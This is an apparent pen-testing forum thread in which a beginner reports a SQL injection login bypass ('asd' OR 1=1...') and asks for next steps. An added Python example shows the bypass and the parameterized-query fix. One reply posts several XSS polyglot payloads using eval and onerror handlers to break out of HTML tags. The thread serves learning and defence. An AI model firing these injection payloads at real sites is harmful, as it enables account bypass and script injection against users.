khudz Posted December 13, 2017
Hello team, I'm new here, as I am new to penetration testing. My next challenge is to perform proper pen-testing on a Win XP SP2 and a CentOS (WebApp) server. I successfully finished with the Win XP in all aspects; as for the CentOS, I managed to inject SQL (asd' OR 1=1 OR 'a'='a) into the login form and get basic information, but that was it. I tried using scripts (<script>alert(1);</script>) but nothing worked; the Nessus scan showed it's XSS vulnerable. I guess my main point is how much further I can dig into the target, and how? Cheers
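An added example, not code from the thread or from the target application: a minimal login check in Python/sqlite3 showing why the payload quoted above bypasses a string-concatenated query and why binding parameters is the fix. The table name, column names and stored credentials are constructed assumptions, since the thread does not show the real schema.

```python
import sqlite3

# Constructed in-memory user table standing in for the web app's login backend
# (assumption: the real schema is not known from the thread).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    return conn

def login_vulnerable(conn, username, password):
    """String-concatenated query: the defective 'before' version.

    The user-supplied text becomes part of the SQL grammar, so a quote in the
    input closes the literal and the rest is parsed as SQL.
    """
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn, username, password):
    """Bound parameters: the input is passed as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

# The value quoted verbatim from the first post in the thread.
PAYLOAD = "asd' OR 1=1 OR 'a'='a"

def demo():
    """Return the outcome of each login variant so the difference is checkable."""
    conn = make_db()
    return {
        # WHERE username = 'asd' OR 1=1 OR 'a'='a' AND password = '...' is always true
        "vulnerable_with_payload": login_vulnerable(conn, PAYLOAD, PAYLOAD),
        # The same text is compared as a literal username: no such user, no row
        "parameterized_with_payload": login_parameterized(conn, PAYLOAD, PAYLOAD),
        # Real credentials still work through the parameterized path
        "parameterized_valid": login_parameterized(conn, "admin", "correct horse battery staple"),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The vulnerable path accepts the payload without knowing any credential, while the parameterized path rejects it and still accepts the genuine login; this is the check a reviewer would run on the CentOS app's login code.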
digininja Posted December 13, 2017
Unfortunately, without a lot more info, your question is too vague to give any specific help. How good are your HTML and JavaScript skills? I'd suggest looking at the SecurityTube web app testing videos; they cover stuff like this and should give you a good idea of what is going on. And if you are following a course, I'd look for a more up-to-date one; anything still using XP as a victim is very out of date.
zoro25 Posted December 13, 2017 (edited)
Also, I would suggest looking in the console of your browser for errors when injecting. As already mentioned, without knowing the app or the JS/HTML of the page it's hard to give a working payload. However, you can try either

-->'";</ScriPT><sCriPt><confirm()</scRiPt>

which may better break out of the HTML and is nice and short (similar to what you tried, but I included single and double quotes and also the end of a comment, just in case you end up in a comment section). Or you can try a polyglot injection payload (these will usually set off a WebApp Firewall, but feel free to try):

javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>"><img -/style=a:expression(/*'/-/*',/**/eval(name)/*%2A///*///);width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"

Or

jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!--

which are both attempting to do the same thing. Good luck.

***** EDIT
While it's not my intention to pop alerts on the hak5 forum, you can see that one of the polyglots is working as planned and is breaking out of tags to show a broken image. This is the equivalent of <img src="x" />. From here you would just need to tweak the code to pop an alert on a broken image; remember to read the console and attempt to bypass protections. onerror=confirm() or something similar for a basic pop on a broken image.

Edited December 18, 2017 by zoro25